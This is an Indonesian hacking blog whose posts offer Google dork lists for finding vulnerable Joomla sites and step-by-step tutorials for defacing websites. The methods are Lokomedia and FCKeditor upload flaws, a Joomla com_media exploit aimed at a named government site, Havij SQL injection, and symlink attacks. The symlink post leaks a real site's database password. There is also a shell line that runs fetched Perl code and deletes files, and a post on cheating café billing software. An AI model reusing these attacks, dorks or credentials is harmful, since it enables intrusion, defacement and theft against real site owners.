Random Post

Kamis, 06 Februari 2014

Dork Com_User 2014 Terbaru

Home Page Beez joomla 1.6
Home Page Beez2 joomla 1.6
Home Page Beez5 joomla 1.6
com_sefservicemap joomla 1.5
com_phocaguestbook joomla 1.5
com_phocagallery joomla 1.5
com_fireboard joomla 1.5
inurl:gov index.php/using-joomla/extensions/components/users-component/registration-form

intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com
inurl:Home Page Beez5 joomla 1.6 index.php/using-joomla/extensions/components/users-component/registration-form site:br
site:com inurl:Home Page Beez joomla 1.6 index.php using-joomla
inurl:index.php joomla! 1.7 - open source content management site:
inurl:index.php/using-joomla/extension/components/content-component/article-category-list/50-upgraders site:com
intext:joomla! 1.7 - open source content management site:jp
inurl:index.php/19-sample-data-articles/joomla/50-upgraders site:id
inurl:index.php/using-joomla/extensions/templates/beez-2/home-page-beez-2 site:as
inurl:index.php/19-sample-data-articles/joomla site:com
intext:Usar un nombre de usuario y contraseña válido para poder tener acceso a la Administración.. Joomla!® es software libre distribuido bajo la licencia GNU/GPL. Pack creado por Joomla!Spanish - 2011 - Hosting Joomla Spanish Webempresa
intitle:home page beez joomla 1.6 inurl:com/joomla
intitle:home page beez 2 inurl:com/joomla
intitle:home page beez 5 inurl:com/joomla
intitle:home page atomic inurl:com/joomla
intext:Joomla!® - бесплатное программное обеспечение, распространяемое по лицензии GNU General Public License
Локализация: Портал Joomla! по-русски. Техническая поддержка: Форум русской поддержки Joomla! CMS inurl:/administrator
intext:Veuillez utiliser un identifiant et un mot de passe valides pour accéder à l'administration. site:it
intext:Введите существующие логин и пароль доступа к Панели управления. site:ru
inurl:/administrator/index.php intext:Use a valid username and password to gain access to the administrator backend. Joomla!® is free software released under the GNU General Public License.
intitle:joomla! intext:joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com
inurl:index.php/using-joomla/extensions/components/users-component/registration-form
allintext:"Use a valid username and password to gain access to the administrator backend."
Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors. site:uk
inurl:/index.php?option=com_users intext:joomla
inurl:/joomla/index.php?option=com_users
inurl:/v1/index.php?option=com_users
inurl:/v2/index.php?option=com_users
inurl:/en/index.php?option=com_users
inurl:/index.php?option=com_users&view=registration
intext:Joomla! 1.5
inurl:/index.php?option=com_users&view=reset
inurl:/index.php?option=com_user&view=reset site:gr
intext:COM_LOGIN_JOOMLA_ADMINISTRATION_LOGIN
intext:Joomla!®is free software released under the GNU General Public License.
inurl:/index.php?option=com_users&view=registration site:com.
inurl:index.php/19-sample-data-articles/joomla
inurl:index.php/joomla/content/category-blog/24-joomla
inurl:index.php/using-joomla/extensions/templates/beez-2/home-page-beez-2
inurl:Home Page Beez5 joomla 1.6
index.php/using-joomla/extensions/components/users-component/registration-form site:br
site:com inurl:Home Page Beez joomla 1.6 index.php using-joomla
inurl:index.phpjoomla! 1.7 - open source content management site:
inurl:index.php/using-joomla/extension/components/content-component/article-category-list/50-upgraders site:com
intext:joomla! 1.7 - open source content management site:jp
inurl:index.php/19-sample-data-articles/joomla/50-upgraders site:id
inurl:index.php/using-joomla/extensions/templates/beez-2/home-page-beez-2site:as
inurl:index.php/19-sample-data-articles/joomla site:com
intext:"joomla! 1.7 - Open Source Content Management" inurl:statscrop+gov
intext:"joomla! 1.6 - Open Source Content Management" inurl:statscrop+gov
intext:"joomla! 1.7 - Open Source Content Management" inurl:statmyweb+gov
intext:"joomla! 1.6 - Open Source Content Management" inurl:statmyweb+gov
intext:"joomla! 1.6 - Open Source Content Management" inurl:gov rank
intext:joomla! 1.7 site:sites-guide.co.il
Powered by Warp Theme Framework joomla site:rs
Powered by Joomla k2 site:rs
Joomla Templates - by Joomlage.com site:rs
Powered by joomlashine site:mk
Joomla template freaks site:gr
Powered by Joomla templates by SiteGround
site:rs build joomla
site:rs Using Joomla!
joomla24 site:rs
Joomla 2.5 Templates designed by Joomla Web Design site:rs
Joomla template created with Artisteer. site:rs
Joomla Templates by Joomla51.com
Joomla templates by a4joomla
Joomla Templates by Joomla-Monster.com site:Rs
Powered by JoomGallery site:rs
joomla Powered by T3 Framework site:Rs
Joomla Templates by ZooTemplate.Com. site:Rs
Joomla Templates By JM-Experts! site:rs
Design by Youjoomla.com site:rs
Designed by Shape5.com Joomla Templates site:rs
Designed by free-templates.lt. site:rs
inurl:/index.php/joomla-pages-ii/password-reset
inurl:/index.php/joomla/ site:rs
template designed by lernvid.com site:Rs
FaLang translation system by Faboba site:rs NEW !
"youjoomla" site:rs
Built with HTML5 and CSS3 joomla site:rs
inurl:index.php/using-joomla/extensions/plugins site:.com
inurl:index.php/using/joomla site:com
inurl:index.php/using-joomla/extensions/components/content-component/article-category-list/50-upgraders
inurl:index.php/using-joomla/extensions/components/content-component/article-categories/28-park-site/photo-gallery
inurl:index.php/using-joomla/parameters/26-sample-data-articles/park-site
Inurl:index.php/plugins site:com
Inurl:index.php/rss=feed site:com
inurl:index.php/joomla/content/category-blog/24-joomla site:com
inurl:index.php/using-joomla/extensions/components/content-component/article-categories/84-gd-articles site:
inurl:Home Page Beez joomla 1.6 index.php using-joomla
inurl:index.php joomla! 1.7 - open source content management site:
inurl:index.php/using-joomla/extension/components/content-component/article-category-list/50-upgraders site:com intext:joomla! 1.7 - open source content management site:jp
inurl:index.php/19-sample-data-articles/joomla/50-upgraders site:id inurl:index.php/using-joomla/extensions/templates/beez-2/home-page-beez-2 site:as
inurl:index.php/19-sample-data-articles/joomla site:com
inurl:Home Page Beez5 joomla 1.6 index.php/using-joomla/extensions/components/users-component/registration-form site:br site:com
com_user dog
com_user salut
com_user accueil
com_user proche
com_user coke
com_user by admin
com_user téléphone
com_user nouvelles
com_user Partager
com_user Jeux
com_user Page
com_user calendrier    
com_user voiture    
com_user moteur
com_user Zigarette
com_user heute abend
com_user die Gabel
com_user das Glas
com_user die Tasse
com_user Chauffeur
com_user arm
com_user langsam
com_user braun
com_user die Stadt
com_user der Whisky
com_user Bier
com_user heute
com_user von dort
com_user das Land
com_user das Alter
com_user das Jahr
com_user ein wenig
com_user im Sommer
com_user der Kaffee
com_user das Programm
com_user hacken
com_user das Essen
com_user die Zeit
com_user sich hinlegen,schlafen
com_user halb
com_user die Spaghetti
com_user das Hackfleisch
com_user das Salz
com_user der Pfeffer
com_user die Ananas
com_user der Fisch
com_user das Ei
com_user der Dezember
com_user das Feuerzeug
com_user das Brot
com_user das Streichholz
com_user das Wasser
com_user der Weg
com_user die Einsamkeit
com_user besuchen
com_user vergessen
com_user verbringen
com_user gefallen,mögen
com_user schmerzen
com_user kaufen
com_user das Fleisch
com_user die Dose
com_user die Tomate
com_user der Lauch
com_user marschieren
com_user frühstücken
com_user die Minute
com_user die Welt,Erde
com_user mayor
com_user Abonado
com_user Accesorio
com_user Asfalto
com_user Campaña
com_user Cantina
com_user Caos
com_user Carbon
com_user Club
com_user Depositar
com_user Economia
com_user Expres
com_user Fantasia
com_user Garantia
com_user Garaje
com_user Guitarra
com_user Hotel
com_user İndustria
com_user Kilogram
com_user Lider
com_user Loteria: loto
com_user Macarrones
com_user Maquete
com_user Mesa
com_user ordenador
com_user Mobiliario
com_user Oxigeno
com_user Palacio
com_user Parque
com_user Perfume
com_user Petroleo
com_user Polici
com_user Radiador
com_user Reportaje
com_user Reumastismo
com_user Ritmo
com_user Ruta
com_user Sirena
com_user Tabaco
com_user Taxi
com_user Teatro
com_user Tema
com_user Zigzaguar
com_user Museo
com_user Water
com_user Sun
com_user Street
com_user Good
com_user Bad
com_user Sea
com_user Late
com_user Friend
com_user What time is it?
com_user When?
com_user Who?
com_user How much?
com_user How?
com_user Please
com_user Thank you
com_user Te quiero – Te amo
com_user muy bonito
com_user del computer
com_user tavolo
com_user tabacco
com_user sigaretta
com_user hackerare
com_user Pasta
com_user torta
com_user forcella
com_user coltello
com_user maggiore
com_user haber
com_user ciao
com_user Condividi
com_user programma
com_user Web Hack
com_user frutta
com_user batteria
com_user ora
com_user calendario
com_user strada
com_user quartiere
com_user indirizzo
com_user tè
com_user TV
com_user mostrare
com_user porta
com_user pentola
com_user tubo
com_user gas
com_user sedia
com_user vetro
com_user gioco
com_user anatra
com_user scimmia
com_user tigre
com_user oro
com_user collana
com_user soldi
com_user ****llo
inurl:index.php?option="com_user"
inurl:/about.php?ID=terms#
intext:"Welcome to the Frontpage"
dork:.index.php?option=com_user&view=reset&layout=confirm
com_user.manhole - İngilizce
com_user.tombino - italyanca
com_user.regard - Fransızca
com_user.pozo de visita - ispanyolca
com_user.ανθρωποθυρίδα - yunanca
com_user.люк - Rusca
com_user.マンホール - Japonca
/components/com_user/models/sql.txt;perl sql.txt;rm -rf sql*;fetch
inurl:gov rank Quote:intext:Joomla! is the mobile-
ready and user-friendly way to
build your website. Choose from
thousands of features and designs.
Joomla! is free and open source. Quote:intext:The Joomla! name is
used under a limited license from
Open Source Matters in the United
States and other
countries.JoomlaShine.com is not
affiliated with or endorsed by Open Source Matters or the Joomla!
Project.
intext:Joomla! 1.7A continues
development of the Joomla
Framework and CMS as a powerful
and flexible way to bring your vision
of the web to reality
intext:Joomla!
Spanish.Gestor de Contenido Open
Source 2.5 inurl:com/joomla
Selamat Mencoba Hacking :D
Creator : Queen

Minggu, 02 Februari 2014

Cara Deface Metode Bug's CMS Lokomedia

Assalamualaikum
Kembali di Dzikri-decode.blogspot.com. Kali ini saya akan share tentang Cara Deface Metode Bug's CMS Lokomedia... GPL [Ga Pake Lemot] :p
Oke langsung saja yaa sob (^_^) Ini Tutornya




Dork : allinurl:media.php?module=berita















Pilih suatu web yang menurut anda bisa di deface dengan lokomedia.

http://www.target.com/admin/content.php?module=banner


Langsung ganti url web target nya menjadi sperti berikut :


http://www.target.com/admin/modul/mod_banner.php
















Kemudian klik icon Tambah Banner dan akan muncul Halaman Upload banner, jangan diapakan dahulu, sekarang kita copy semua html tersebut dengan cara CTRL + U dan simpan di Notepad. Didalam Source tersebut ada :


./aksi.php?module=banner&act=input





http://www.target.com/admin/aksi.php?module=banner&act=input

Simpan dengan Nama apa saja terserah anda kehendaki dengan format .html, kemudian buka file tersebut dan isilah dengan backdoor yang anda miliki. Selanjutnya tinggal lihat hasil nya di :
 
http://www.target.com/admin/foto_berita/shell.php

Setelah itu terserah kreasi anda sendiri yang mempunyai backdoor menjadi hak utuh milik anda , kami hanya share ilmu yang kami tahu dan tidak untuk membahayakan dan merugikan pihak lain bahkan resiko anda sendiri yang menanggungnya. Dan Untuk admin website Lokomedia saya harapkan untuk menutup bugs tersebut agar website anda aman dari serangan defacer yang banyak di dunia maya ini. Semoga Bermanfaat untuk anda semua sob (^_^)
Copaz Beri Sumber ya : Dzikri-decode.blogspot.com

Cara Deface Metode Exploit Joomla|Com_Media

Assalamualaikum....
Kali ini Saya membahas mengenai Teknik Exploit Joomla yang memiliki Vulnerabilitas pada Component Media di CMS Joomla.. :) pada penasaran gimana caranya? Nyimak

Dork : inurl:com_media site:com

Exploit: /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Pertama sobat cari dah targetnya dulu di google dengan memanfaatkan dork diatas, dan kalo bisa Dork Dikreasikan 





Saya Menemukan Target Lumayan : http://www.pn-sleman.go.id/ [ go.id bro Lumayan ]

Nah, sekarang kita  tambahin aja exploitnya, jadinya begini:

http://www.pn-sleman.go.id/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

 maka akan terlihat seperti gambar berikut:
 
 
 
 
 
 
Selanjutnya sobat tinggal upload file yang sobat inginkan di bagian upload
 
 
 
 
Note: File yang bisa diupload Hanya Bisa .txt .jpg .gif .png.

kalo berhasil, akan muncul keterangan seperti berikut:
 
 
 
 
 
 
Nah, untuk melihat hasil file yang sudah kita upload di sini: site.com/images/file
cth: http:/www.pn-sleman.go.id/images/DzikriID.txt
lihat hasil file yang sudah saya upload tadi :) tinggal Submit aja di deface archiver :p

 
 




Cuma Itu Yang  Bisa Saya Share Selebihnya Usaha
Creator : Dzikri Dot ID

Kamis, 30 Januari 2014

Cara Hack Biling Dengan Cheat Engine

Assalamualaikum
Kali ini saya akan Share Tutor Hack Biling Dengan Cheat Engine

Di Warnet Saya Nich. Karena Udah Akrab Sama Adminnya [Hehe]

 


 Langsung aja gan :D

Cara-caranya:

1. Install Dulu Cheat Engine nya!
2. Buka Cheat Engine
3. klik gambar komputer dan kaca pembesar. icon
4.Cari Proses Billingnya
5.cheklist enable speedhack
6.trus isi kolomnya dengan rumus dibawah ini!

nih rumusnya :
0.1=1jam jadi 10 jam
0.2=1jam jadi 5 jam
0.3=1jam jadi 3.33jam
0.4=1jam jadi 2.5 jam
0.5=1jam jadi 2 jam
0.6=1jam jadi 1.66jam
0.7=1jam jadi 1.42jam
0.8=1jam jadi 1.25jam
0.9=1jam jadi 1.11jam
1.0=1jam jadi ya 1jam

Jika Ingin Repost/ Copas Usahakan Kasih Sumber : dzikri-decode.blogspot.com

Cara Deface Web Metode Sql Injection Havij

Assalamualaikum
Oke, kali ini saya akan memberikan tutorial tentang bagaimana cara mendeface website dengan havij SQL Injection
Tool havij sendiri fungsinya memang untuk sql injection, jadi kita tidak perlu capek2 untuk inject manual. cukup dengan klik klik langsung beres deh.

Tool ini juga cukup apik, karena sudah disertakan md5 cracker, admin finder dll.
Tool havij yg saya gunakan disini adalah versi 1.10. Bagi yang belum punya tool havij silahkan download :

Disini Sob (^_^)

Bagi yg sudah mahir menggunakan tool ini, pasti sudah tahu dan lewat saja. Namun bagi yang belum pernah mencoba pasti bingung. Simak baik-baik tutorial ini. Langsung saja kita menuju ke TKP.

1. Cari Targetnya dulu dengan dork: berita.php?id=100
Disini saya sudah mendapatkan target yaitu:
http://www.thenaturalbabyco.com/product.php?pID=100032
2. Kemudian buka tool havij kalian, dan masukan url korban dimenu TARGET. Lihat sperti gambar berikut:


   

 3. Setelah itu klik ANALIZE. Tunggu beberapa saat. nah, setelah selesai dan sudah dianalyze, maka akan muncul informasi server target dan yang terpenting adalah nama databasenya. Simak gambar dibawah ini:




4. Sekarang tinggal mencari tabelnya. klik tabel. dan klik GET TABLES simak gambar dibawah ini:





5. Setelah nama-nama tabelnya sudah keluar, sekarang saatnya mencari kolom. Pilih salah satu tabel dengan menchecklistnya lalu klik GET COLUMNS. Simak gambar dibawah ini:

 

6. Setelah columns dari tabelnya sudah keluar, maka langkah terakhir adalah dump isinya. Saya disini akan mengedump tabel administrator, yang didalamnya terdapat columns username dan password. checklist kolom mana yg ingin didump lalu klik GET DATA. Contoh lihat gambar dibawah ini:

  Nb: Ane Tutup Agar Anda Bisa Usaha Sendiri

Oke, kita sudah dapat username dan passwordnya. sekarang tinggal mendecrypt passwordnya dan mencari admin pagenya.



  • Untuk mendecrypt password bisa dilakukan ditab md5 lalu masukan passwordnya dan klik Start.

  • Untuk mencari admin page nya bisa dilakukan ditab Find Admin setelah itu masukan url korban dan klik Start.

Nanti akan muncul halaman adminnya. Misalnya tidak muncul bisa menggunakan alternatif lain sperti mencari admin page dengan Admin Finder.

Kalau misalnya adminnya tidak ketemu juga, anda bisa menscannya dengan tool Acunetix. kalau tidak dapat juga. Silahkan pasrah dan cari target lain.

Alternatif lain/tempat mendecrypt password juga ada banyak. Silahkan search di google. Atau bisa juga decrypt disini: www.md5decrypter.co.uk

Copaz Beri Sumber ya Biar gk Ada Salah Paham : dzikri-decode.blogspot.com

Creator : Dzikri Dot ID

Selasa, 28 Januari 2014

Cara Mengubah Laptop Menjadi Wifi Hotspot

Assalamualaikum Kamu memiliki lebih dari satu komputer atau perangkat mobile yang ingin terhubung ke Internet? Jika kamu punya koneksi Internet dirumah, kamu bisa membuat Wifi Hotspot sendiri dengan menggunakan Laptop.WiFi sekarang ini menjadi teknologi yang mudah didapat, dimana hampir semua handphone kelas bisnis sudah memiliki dukungan koneksi WiFi. Nah, jika kamu memiliki laptop, maka kamu bisa dengan mudah melakukan sharing koneksi Internet dengan yang lainnya dengan mengubah laptop menjadi WiFi Hotspot menggunakan software. Berikut ini cara mengubah laptop menjadi WiFi HotSpot : 
  •  Download Alatnya
  •  Install Connectify dengan mengikuti langkahnya hingga selesai, lalu restart laptop. 
  • Jalankan program Connectify dan sambungkan koneksi internet modem kamu di laptop seperti biasa. 
  • Setelah koneksi Internet tersambung dengan baik, lakukan pengaturan pada Connectify seperti dibawah: 
Screenshot :

 

Catatan :

  • Hotspot Name : isi nama hotspot Laptopmu
  • Password : isi password untuk koneksi hotspot kamu.
  • Internet : pilih koneksi internet yang akan kamu share/ bagikan.
  • Share Over : pilih hardware wifi yang terdapat pada laptop kamu.
  • Sharing mode : pilih wi-fi access point.
Dari komputer/laptop client koneksikan wifi ke akses point yang telah kita buat pada langkah sebelumnya.




    1. Masukkan password seperti password pada akses point.
    2. Selesai, kamu bisa langsung browsing di laptop server maupun client.


Hotspot Wifi yang kita buat menggunakan laptop ini juga dapat dimanfaatkan untuk iPad, Android dan perangkat lain yang memiliki fitur Wifi. Selain itu, software ini juga dapat digunakan untuk koneksi Ad-Hoc, jadi antar laptop dapat saling terkoneksi seperti layaknya menggunakan kabel LAN, namun bedanya menggunakan wireless, jadi kamu tidak perlu lagi kabel LAN.

Posted By : Dzikri Dot ID


Cara Deface Web Metode Fck Editor

Assalamualaikum
Deface website dengan teknik FckEditor ini adalah teknik yang paling mudah dalam mendeface sebuah website
Teknik deface Fck Editor dibagi menjadi 4 yaitu :


1. Powered CubeCart


Adalah module Deface Upload file, kita bisa menggunakan cara ini.


Dork    : Powered By CubeCart V 3.0


Exploit :  /admin/includes/rte/editor/filemanager/browser/default/connectors/test.html


Contoh: www.target.com/admin/includes/rte/editor/filemanager/browser/default/connectors/test.html





2. Powered By OpenCart


Dork   :  Powered By OpenCart


Exploit:  admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html


Contoh : www.target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html





3. Powered By OscMax V 2.0


Dork    : Powered By OscMax V 2.0


Exploit : FCKeditor/editor/filemanager/browser/default/connectors/test.html


Contoh ;www.target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html





4. Hacking TXt.


Hacking Txt ini sama saja dengan Konsep 3 di atas it, cuma bedany khusus fiile txt saja yg bisa di upload, bentuk file lain tdk akan mnerima 


Dork   : Inurl:/FCKeditor/editor/filemanager/


Exploit : /FCKeditor/editor/filemanager/browser/default/connectors/test.html
Contoh: www.target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html


dengan mencarinya dengan google dork atau mengexploit urlnya langsung ( tidak semua website support dengan cara fck editor sebaiknya anda mencarinya dengan google dork saja )





Jika sudah ketemu url target maka akan muncul tampilan seperti  ini.







     
     
     
     
     
     
     
  • Ganti connectornya menjadi PHP    
  • Klik choose file sesuai jenis website jika opencart anda bisa upload file html tetapi jika bukan biasanya hanya bisa upload file txt 
  • Klik Upload Jika berhasil maka akan muncul pesan "File Upload No Error"
  • Klik Get folder untuk mendapatkan URL file yang di Upload
        
    Dah Selesai Sob :D Tinggal Nama Situ yg Tadi Di Upload 
Posted By : Dzikri Dot ID

Tahun 2020 Indonesia Tidak Bisa Internetan

 

Assalamualaikum Benarkah  Tahun 2020 Indonesia Tidak Bisa Internetan ?? Tahukah kamu internet di Indonesia memiliki potensi untuk terhenti pada tahun 2020? Menurut kabar dari staf ahli bidang komunikasi dan media massa Kemenkominfo, Henry Subiakto, kapasitas bandwith internet Indonesia pada 2020 akan lebih dari jumlah yang telah dialokasikan.
  "Henry mengatakan, pada tahun 2020, Indonesia membutuhkan 1.7 MHz, namun alokasi yang disediakan oleh pemerintah sebesar 650 MHz. Bila mulai dari saat ini pemerintah tidak melakukan penataan, maka kemungkinan internet Indonesia akan mati sekitar enam tahun lagi". Menurut Henry penataan dapat dilakukan mulai dari penataan frekuensi, misalnya melakukan pengompresan terhadap penggunaan bandwith oleh stasiun televisi dengan bandwith 8 MHz. Karena seharusnya 8 MHz dapat digunakan oleh sepuluh stasiun TV, bukan hanya satu saja.
 Makanya Beberapa Hari ini Koneksi Internet Kita Sering Down/Up. Mungkin Itu Bisa Terjadi di Dunia. Jika Tanpa Internet apakah kita Bisa Hidup ??? Mau Gimana Gan

Pindah Negara ?? Hehe 



Sumber Google 
Copas Beri Sumber dzikri-decode.blogspot.com
Posted By : Dzikri Dot ID

Cara Deface Web Metode Symlink

Assalamualaikum

Halo sob (^_^), kali ini saya akan berbagi cara menggunakan Symlink.
Saya anggap agan udah punya target dan sudah di pasang Backdoor/shell di web target, saya tidak akan menjelaskan caranya, karena saya anggap agan sudah bisa mencari target sendiri (^_^).

Pertama masuk ke Shell yang sudah di tanam di web target.
lalu upload Sym.php ( Digunakan untuk SYMLINK ).
Klo belum punya silahkan Download Disini Sob (^_^)



















 


Pada gambar di atas saya sudah upload sym.php melalui shell yang saya tanam.


Selanjutnya akses / buka symlink yang telah agan upload.


















 

Lalu klik user & domain & symlink.


















 


Terlihat banyak sekali target-target lain, dan yang akan saya jadikan target adalah thefussyeater.org lalu klik "symlink".


















 


Lalu kita cari confignya, dan target saya ini wordpress saya menemukan wp-config.php lalu saya klik.


Jika CMS Joomla cari saja configuration.php, jika CMS Lokomedia, cari saja di config/koneksi.php, jika CMS Balitbang cari saja di lib/config.php.


















 


Perhatikan baris ini :
define('DB_HOST', 'localhost');


DB NAME = thefussy_wrdp3


DB USER = thefussy_wrdp3


DB PASSWORD = CZyLRz1EuwSd


DB HOST = localhost
Diatas adalah informasi mengenai Akses Database MySQL.


Lalu setelah mendapatkan informasi username & password Database MySQL seperti diatas, kembali ke shell pertama.


















 


Klik koneksi MySQL.

















Lalu isi dengan data - data yang telah di peroleh pada file configurasi  diatas tadi, dan saya klik Connect.


Jika di dalam shell agan tidak ada menu Koneksi MySQL Download INI lalu Upload , akses dan login.



















 


Lalu, saya klik "wp_user".



















 


Terlihat passwordnya dalam bentuk encrypt md5, jadi kita rubah saja (^_^).
Agan buat password dalam bentuk MD5 Disini Sob (^_^).




Saya mencoba password 121212 dan setelah di enskripsi menjadi 93279e3308bdbbeed946fc965017f67a Lalu saya rubah password wp-user nya dan saya ganti dengan password saya 93279e3308bdbbeed946fc965017f67a





















 

Saya sudah merubah dengan 93279e3308bdbbeed946fc965017f67a dan saya klik confirm untuk menyimpan pengaturannya, dan pada pengaturan selanjutnya klik Yes.


Berarti saya akan login dengan username admin dan password 121212.
Sekarang kita coba sob (^_^). 

















 


Saya coba ke halaman login webnya http://thefussyeater.org/wp-admin


Saya login & wauuuuu, kereennn sob (^_^).


Saya berhasil masuk (^_^).


















 



Jika sudah seperti ini terserah anda sob,  
kalo pengen nanam shell silahkan, asal jangan lupa di backup file pentingnya dan jangan di rusak (^_^)

Selamat Mencoba (^_^).
Copaz Beri Sumber Cuk :v http://dzikri-decode.blogspot.com